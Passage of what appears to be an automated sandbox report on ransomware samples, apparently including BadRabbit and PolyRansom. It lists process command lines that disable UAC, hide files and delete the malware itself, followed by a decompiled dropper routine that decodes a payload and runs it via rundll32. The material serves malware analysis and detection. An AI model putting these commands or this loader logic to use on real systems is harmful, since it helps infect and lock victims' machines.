                                                                                                        Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:46
                                                                                                        Start time:14:45:30
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:47
                                                                                                        Start time:14:45:30
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:225280 bytes
                                                                                                        MD5 hash:3ED3FB296A477156BC51ABA43D825FC0
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 95%, ReversingLabs
                                                                                                        • Detection: 82%, Metadefender, Browse

                                                                                                        Target ID:48
                                                                                                        Start time:14:45:30
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:49
                                                                                                        Start time:14:45:34
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:50
                                                                                                        Start time:14:45:34
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:taskkill /f /im "E"
                                                                                                        Imagebase:0x890000
                                                                                                        File size:74752 bytes
                                                                                                        MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:51
                                                                                                        Start time:14:45:34
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:ping -n 1 127.0.0.1
                                                                                                        Imagebase:0x1000000
                                                                                                        File size:18944 bytes
                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:52
                                                                                                        Start time:14:45:36
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:schtasks /Delete /F /TN rhaegal
                                                                                                        Imagebase:0x150000
                                                                                                        File size:185856 bytes
                                                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:53
                                                                                                        Start time:14:45:36
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                        Wow64 process (32bit):
                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe"
                                                                                                        Imagebase:
                                                                                                        File size:2511528 bytes
                                                                                                        MD5 hash:DBFBF254CFB84D991AC3860105D66FC6
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 45%, ReversingLabs
                                                                                                        • Detection: 31%, Metadefender, Browse

                                                                                                        Target ID:54
                                                                                                        Start time:14:45:36
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\yeYUggIg\rCUUIQEQ.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\yeYUggIg\rCUUIQEQ.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:182784 bytes
                                                                                                        MD5 hash:2CB01F55AB958092E1595D2C55D6E6DA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:55
                                                                                                        Start time:14:45:38
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\ProgramData\sWAsokQQ\wKAwMsck.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\ProgramData\sWAsokQQ\wKAwMsck.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:192512 bytes
                                                                                                        MD5 hash:D3481EFA5B26209A8299D0ED2A72FF2E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                        Target ID:56
                                                                                                        Start time:14:45:40
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom"
                                                                                                        Imagebase:0xd90000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:57
                                                                                                        Start time:14:45:40
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:58
                                                                                                        Start time:14:45:40
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                                        Imagebase:0x1a0000
                                                                                                        File size:59392 bytes
                                                                                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:59
                                                                                                        Start time:14:45:40
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff61e220000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:60
                                                                                                        Start time:14:45:40
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                                        Imagebase:0x1a0000
                                                                                                        File size:59392 bytes
                                                                                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:61
                                                                                                        Start time:14:45:41
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:62
                                                                                                        Start time:14:45:41
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom
                                                                                                        Imagebase:0x400000
                                                                                                        File size:225280 bytes
                                                                                                        MD5 hash:3ED3FB296A477156BC51ABA43D825FC0
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:63
                                                                                                        Start time:14:45:41
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\reg.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                                        Imagebase:0x1a0000
                                                                                                        File size:59392 bytes
                                                                                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:64
                                                                                                        Start time:14:45:41
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff756d70000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:65
                                                                                                        Start time:14:45:41
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7c72c0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Target ID:66
                                                                                                        Start time:14:45:42
                                                                                                        Start date:29/09/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nKgYAAYU.bat" "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe""
                                                                                                        Imagebase:
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:3.9%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:29.5%
                                                                                                          Total number of Nodes:88
                                                                                                          Total number of Limit Nodes:13
                                                                                                          execution_graph 2495 881f3b 2496 881f4f 2495->2496 2497 882012 2496->2497 2499 881fe4 memcpy 2496->2499 2498 882dcb 3 API calls 2497->2498 2500 881dd2 2497->2500 2498->2500 2499->2497 2380 8812c0 2400 881660 2380->2400 2383 8812eb GetCommandLineW CommandLineToArgvW 2384 881487 2383->2384 2386 88130f 2383->2386 2429 881499 2384->2429 2388 881339 wcsstr 2386->2388 2389 881318 2386->2389 2387 881495 2388->2389 2389->2389 2390 88138f GetSystemDirectoryW 2389->2390 2390->2384 2391 8813a9 lstrcatW 2390->2391 2391->2384 2392 8813c3 2391->2392 2402 8810c0 GetModuleHandleW GetModuleFileNameW 2392->2402 2394 8813d5 2394->2384 2424 881260 CreateFileW 2394->2424 2397 8813f9 wsprintfW 2398 881430 2397->2398 2398->2398 2399 881449 CreateProcessW ExitProcess 2398->2399 2401 8812cd GetCommandLineW 2400->2401 2401->2383 2401->2384 2403 88110d 2402->2403 2404 88123e 2402->2404 2433 881000 CreateFileW 2403->2433 2405 881499 3 API calls 2404->2405 2408 88124b 2405->2408 2407 881126 2407->2404 2409 88112e GetProcessHeap RtlAllocateHeap 2407->2409 2408->2394 2411 881189 memcpy 2409->2411 2412 881225 2409->2412 2414 8811aa GetProcessHeap RtlAllocateHeap 2411->2414 2416 88119e 2411->2416 2413 881499 3 API calls 2412->2413 2415 881238 2413->2415 2417 8811e5 GetProcessHeap 2414->2417 2418 8811d0 2414->2418 2415->2394 2416->2414 2416->2416 2421 881210 2417->2421 2443 881690 2418->2443 2422 881499 3 API calls 2421->2422 2423 88121f 2422->2423 2423->2394 2425 8812aa 2424->2425 2426 881284 WriteFile 2424->2426 2425->2384 2425->2397 2427 881299 2426->2427 2428 8812a3 FindCloseChangeNotification 2426->2428 2427->2428 2428->2425 2430 8814a1 2429->2430 2431 8814a4 UnhandledExcep GetCurrentProcess TerminateProcess 2429->2431 2430->2387 2431->2387 2434 88102b GetFileSize 2433->2434 2435 8810b5 2433->2435 2436 881039 GetProcessHeap RtlAllocateHeap 2434->2436 2437 8810a3 FindCloseChangeNotification 2434->2437 2435->2407 2438 881050 ReadFile 2436->2438 2439 881091 2436->2439 2437->2407 2438->2439 2440 88106a 2438->2440 2439->2437 2440->2439 2441 88106f GetProcessHeap 2440->2441 2442 88107e CloseHandle 2441->2442 2442->2407 2448 882ca1 2443->2448 2447 8816d9 2447->2417 2457 882c14 2448->2457 2450 8816c9 2450->2447 2451 88173c 2450->2451 2453 881750 2451->2453 2456 881dd0 2451->2456 2452 882a4f 2452->2456 2462 882dcb 2452->2462 2453->2452 2454 881b8f memcpy 2453->2454 2453->2456 2454->2453 2456->2447 2458 882c21 2457->2458 2459 882c33 2457->2459 2458->2459 2461 883393 malloc 2458->2461 2459->2450 2461->2459 2463 882de1 2462->2463 2464 882e39 memcpy 2463->2464 2465 882e21 memcpy 2463->2465 2467 882dfa 2463->2467 2466 882e58 memcpy 2464->2466 2464->2467 2465->2467 2466->2467 2467->2456 2488 881be4 2492 8817be 2488->2492 2489 882a4f 2490 882dcb 3 API calls 2489->2490 2491 881dd0 2489->2491 2490->2491 2492->2489 2492->2491 2493 881b8f memcpy 2492->2493 2493->2492 2513 8828d5 2514 8828df 2513->2514 2515 882dcb 3 API calls 2514->2515 2516 881dd2 2514->2516 2515->2516 2494 8833a6 ??3@YAXPAX

                                                                                                          Callgraph

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 78%
                                                                                                          			E008810C0(void* __ebx, long* __ecx, void* __edi, void** _a4) {
                                                                                                          				signed int _v8;
                                                                                                          				short _v1568;
                                                                                                          				long _v1572;
                                                                                                          				WCHAR* _v1576;
                                                                                                          				char _v1580;
                                                                                                          				long* _v1584;
                                                                                                          				void** _v1588;
                                                                                                          				void* __esi;
                                                                                                          				void* _t46;
                                                                                                          				intOrPtr _t47;
                                                                                                          				void* _t48;
                                                                                                          				intOrPtr _t49;
                                                                                                          				void* _t52;
                                                                                                          				long _t56;
                                                                                                          				void* _t58;
                                                                                                          				void* _t63;
                                                                                                          				int _t65;
                                                                                                          				void* _t66;
                                                                                                          				int _t67;
                                                                                                          				void* _t68;
                                                                                                          				intOrPtr _t69;
                                                                                                          				void* _t70;
                                                                                                          				long _t76;
                                                                                                          				void* _t77;
                                                                                                          				void _t85;
                                                                                                          				void* _t89;
                                                                                                          				void* _t91;
                                                                                                          				void* _t92;
                                                                                                          				void* _t95;
                                                                                                          				void* _t97;
                                                                                                          				signed int _t98;
                                                                                                          
                                                                                                          				_t89 = __edi;
                                                                                                          				_t66 = __ebx;
                                                                                                          				_v8 =  *0x888000 ^ _t98;
                                                                                                          				_t86 =  &_v1568;
                                                                                                          				_v1588 = _a4;
                                                                                                          				_v1584 = __ecx;
                                                                                                          				_v1576 = 0;
                                                                                                          				if(GetModuleFileNameW(GetModuleHandleW(0),  &_v1568, 0x30c) == 0) {
                                                                                                          					L17:
                                                                                                          					return E00881499(0, _t66, _v8 ^ _t98, _t86, _t89, 0);
                                                                                                          				} else {
                                                                                                          					_t46 = E00881000( &_v1568,  &_v1572,  &_v1580); // executed
                                                                                                          					if(_t46 == 0) {
                                                                                                          						goto L17;
                                                                                                          					} else {
                                                                                                          						_t76 = _v1572;
                                                                                                          						_t47 =  *((intOrPtr*)(_t76 + 0x3c));
                                                                                                          						_t48 = _t47 + _t76;
                                                                                                          						_t77 = ( *(_t47 + _t76 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                                          						_t88 =  *(_t48 + 6) & 0x0000ffff;
                                                                                                          						if(_t88 > 0) {
                                                                                                          							_t77 = _t77 + _t88 * 8;
                                                                                                          						}
                                                                                                          						_t49 =  *((intOrPtr*)(_t48 + 0x98));
                                                                                                          						_push(_t89);
                                                                                                          						_t91 =  *((intOrPtr*)(_t77 - 0x28 + 0x14)) +  *((intOrPtr*)(_t77 - 0x28 + 0x10));
                                                                                                          						if(_t49 == 0) {
                                                                                                          							_t49 = _v1580;
                                                                                                          						}
                                                                                                          						_push(_t66);
                                                                                                          						_t67 = _t49 - _t91;
                                                                                                          						_t52 = RtlAllocateHeap(GetProcessHeap(), 0, _t67); // executed
                                                                                                          						_t97 = _t52;
                                                                                                          						if(_t97 == 0) {
                                                                                                          							_pop(_t68);
                                                                                                          							_pop(_t92);
                                                                                                          							return E00881499(_v1576, _t68, _v8 ^ _t98, _t88, _t92, _t97);
                                                                                                          						} else {
                                                                                                          							memcpy(_t97, _t91 + _v1572, _t67);
                                                                                                          							if(_t67 != 0) {
                                                                                                          								_t85 =  *_t97;
                                                                                                          								_t65 = _t67;
                                                                                                          								do {
                                                                                                          									_t85 = _t85 ^ 0x000000e9;
                                                                                                          									_t65 = _t65 - 1;
                                                                                                          								} while (_t65 != 0);
                                                                                                          								 *_t97 = _t85;
                                                                                                          							}
                                                                                                          							_t56 =  *_t97;
                                                                                                          							_v1572 = _t56;
                                                                                                          							_t58 = RtlAllocateHeap(GetProcessHeap(), 8, _t56); // executed
                                                                                                          							 *_v1588 = _t58;
                                                                                                          							if(_t58 == 0) {
                                                                                                          								L14:
                                                                                                          								_t69 = _v1576;
                                                                                                          							} else {
                                                                                                          								_t28 = _t97 + 4; // 0x4
                                                                                                          								_t88 = _t28;
                                                                                                          								_t63 = E00881690(_t58,  &_v1572, _t28, _t67 + 0xfffffffc); // executed
                                                                                                          								if(_t63 != 0) {
                                                                                                          									goto L14;
                                                                                                          								} else {
                                                                                                          									_t88 = _v1572;
                                                                                                          									 *_v1584 = _v1572;
                                                                                                          									_t69 = 1;
                                                                                                          								}
                                                                                                          							}
                                                                                                          							HeapFree(GetProcessHeap(), 0, _t97);
                                                                                                          							_pop(_t70);
                                                                                                          							_pop(_t95);
                                                                                                          							return E00881499(_t69, _t70, _v8 ^ _t98, _t88, _t95, _t97);
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}


































                                                                                                          0x008810c0
                                                                                                          0x008810c0
                                                                                                          0x008810d0
                                                                                                          0x008810dc
                                                                                                          0x008810e6
                                                                                                          0x008810ec
                                                                                                          0x008810f2
                                                                                                          0x00881107
                                                                                                          0x0088123e
                                                                                                          0x0088124e
                                                                                                          0x0088110d
                                                                                                          0x00881121
                                                                                                          0x00881128
                                                                                                          0x00000000
                                                                                                          0x0088112e
                                                                                                          0x0088112e
                                                                                                          0x00881134
                                                                                                          0x0088113c
                                                                                                          0x0088113e
                                                                                                          0x00881142
                                                                                                          0x00881148
                                                                                                          0x0088114d
                                                                                                          0x0088114d
                                                                                                          0x00881150
                                                                                                          0x00881159
                                                                                                          0x0088115d
                                                                                                          0x00881162
                                                                                                          0x00881164
                                                                                                          0x00881164
                                                                                                          0x0088116a
                                                                                                          0x0088116d
                                                                                                          0x00881179
                                                                                                          0x0088117f
                                                                                                          0x00881183
                                                                                                          0x0088122b
                                                                                                          0x0088122c
                                                                                                          0x0088123b
                                                                                                          0x00881189
                                                                                                          0x00881192
                                                                                                          0x0088119c
                                                                                                          0x0088119e
                                                                                                          0x008811a0
                                                                                                          0x008811a2
                                                                                                          0x008811a2
                                                                                                          0x008811a5
                                                                                                          0x008811a5
                                                                                                          0x008811a8
                                                                                                          0x008811a8
                                                                                                          0x008811aa
                                                                                                          0x008811b5
                                                                                                          0x008811be
                                                                                                          0x008811ca
                                                                                                          0x008811ce
                                                                                                          0x008811fe
                                                                                                          0x008811fe
                                                                                                          0x008811d0
                                                                                                          0x008811d4
                                                                                                          0x008811d4
                                                                                                          0x008811e0
                                                                                                          0x008811e7
                                                                                                          0x00000000
                                                                                                          0x008811e9
                                                                                                          0x008811e9
                                                                                                          0x008811f5
                                                                                                          0x008811f7
                                                                                                          0x008811f7
                                                                                                          0x008811e7
                                                                                                          0x0088120a
                                                                                                          0x00881212
                                                                                                          0x00881213
                                                                                                          0x00881222
                                                                                                          0x00881222
                                                                                                          0x00881183
                                                                                                          0x00881128

                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 008810F8
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000), ref: 008810FF
                                                                                                            • Part of subcall function 00881000: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0088101A
                                                                                                            • Part of subcall function 00881000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0088102D
                                                                                                            • Part of subcall function 00881000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0088103D
                                                                                                            • Part of subcall function 00881000: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 00881044
                                                                                                            • Part of subcall function 00881000: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00881060
                                                                                                            • Part of subcall function 00881000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00881071
                                                                                                            • Part of subcall function 00881000: HeapFree.KERNEL32(00000000,?,?), ref: 00881078
                                                                                                            • Part of subcall function 00881000: CloseHandle.KERNEL32(00000000,?), ref: 00881080
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 00881172
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,?), ref: 00881179
                                                                                                          • memcpy.MSVCRT ref: 00881192
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 008811BB
                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 008811BE
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00881207
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0088120A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$File$Allocate$FreeHandleModule$CloseCreateNameReadSizememcpy
                                                                                                          • String ID: Uqt
                                                                                                          • API String ID: 3076684055-2320327147
                                                                                                          • Opcode ID: 31bd1ec6becc42cca05af7f278f9fa0c788bcc954149b10e064b4044fd88c241
                                                                                                          • Instruction ID: 2c8645bbf48d22a47c0396a0532f6ecb4330e399492a447b2740f96fa49a56ab
                                                                                                          • Opcode Fuzzy Hash: 31bd1ec6becc42cca05af7f278f9fa0c788bcc954149b10e064b4044fd88c241
                                                                                                          • Instruction Fuzzy Hash: 9B41A272A016189BDB20EF69DC48EAAB7BDFF98300F104199E905D7251DF31DD55CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 96%
                                                                                                          			_entry_(void* __ebx) {
                                                                                                          				signed int _v8;
                                                                                                          				short _v1568;
                                                                                                          				short _v3128;
                                                                                                          				char _v4688;
                                                                                                          				int _v4692;
                                                                                                          				char _v4696;
                                                                                                          				char _v4700;
                                                                                                          				struct _PROCESS_INFORMATION _v4716;
                                                                                                          				struct _STARTUPINFOW _v4784;
                                                                                                          				void* __edi;
                                                                                                          				void* __esi;
                                                                                                          				wchar_t* _t43;
                                                                                                          				signed short* _t44;
                                                                                                          				void* _t48;
                                                                                                          				void* _t49;
                                                                                                          				char* _t52;
                                                                                                          				char* _t53;
                                                                                                          				void* _t56;
                                                                                                          				void* _t57;
                                                                                                          				wchar_t* _t61;
                                                                                                          				signed int _t63;
                                                                                                          				signed int _t64;
                                                                                                          				void* _t69;
                                                                                                          				struct _SECURITY_ATTRIBUTES* _t70;
                                                                                                          				signed int _t72;
                                                                                                          				long _t74;
                                                                                                          				wchar_t* _t78;
                                                                                                          				wchar_t** _t79;
                                                                                                          				signed int _t80;
                                                                                                          				void* _t81;
                                                                                                          
                                                                                                          				_t57 = __ebx;
                                                                                                          				E00881660(0x12ac);
                                                                                                          				_v8 =  *0x888000 ^ _t80;
                                                                                                          				_t79 = GetCommandLineW;
                                                                                                          				_t78 = GetCommandLineW();
                                                                                                          				if(_t78 != 0) {
                                                                                                          					_v4692 = 0;
                                                                                                          					_t79 = CommandLineToArgvW(GetCommandLineW(),  &_v4692);
                                                                                                          					if(_t79 != 0) {
                                                                                                          						if(_v4692 != 1) {
                                                                                                          							_t43 = wcsstr(_t78,  *_t79);
                                                                                                          							_t61 =  *_t79;
                                                                                                          							_t81 = _t81 + 8;
                                                                                                          							_t79 =  &(_t61[0]);
                                                                                                          							do {
                                                                                                          								_t74 =  *_t61;
                                                                                                          								_t61 =  &(_t61[0]);
                                                                                                          							} while (_t74 != 0);
                                                                                                          							_t63 = _t61 - _t79 >> 1;
                                                                                                          							_t44 = _t43 + _t63 * 2;
                                                                                                          							if( *(_t43 + _t63 * 2) == 0x22) {
                                                                                                          								_t44 =  &(_t44[1]);
                                                                                                          							}
                                                                                                          							if( *_t44 == 0x20) {
                                                                                                          								_t44 =  &(_t44[1]);
                                                                                                          							}
                                                                                                          							_t73 =  &_v4688 - _t44;
                                                                                                          							do {
                                                                                                          								_t64 =  *_t44 & 0x0000ffff;
                                                                                                          								 *(_t73 + _t44) = _t64;
                                                                                                          								_t44 =  &(_t44[1]);
                                                                                                          							} while (_t64 != 0);
                                                                                                          						} else {
                                                                                                          							_t56 = 0;
                                                                                                          							do {
                                                                                                          								_t5 = _t56 + 0x886cf0; // 0x350031
                                                                                                          								_t72 =  *_t5 & 0x0000ffff;
                                                                                                          								 *(_t80 + _t56 - 0x124c) = _t72;
                                                                                                          								_t56 = _t56 + 2;
                                                                                                          							} while (_t72 != 0);
                                                                                                          						}
                                                                                                          						if(GetSystemDirectoryW( &_v1568, 0x30c) != 0) {
                                                                                                          							_t73 =  &_v1568;
                                                                                                          							if(lstrcatW( &_v1568, L"\\rundll32.exe") != 0) {
                                                                                                          								_t48 = E008810C0(_t57,  &_v4696, _t78,  &_v4700); // executed
                                                                                                          								if(_t48 != 0) {
                                                                                                          									_t49 = E00881260(_v4696, _v4700); // executed
                                                                                                          									_t57 = _t57;
                                                                                                          									if(_t49 != 0) {
                                                                                                          										wsprintfW( &_v3128, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1568, L"infpub.dat",  &_v4688);
                                                                                                          										_t69 = 0x10;
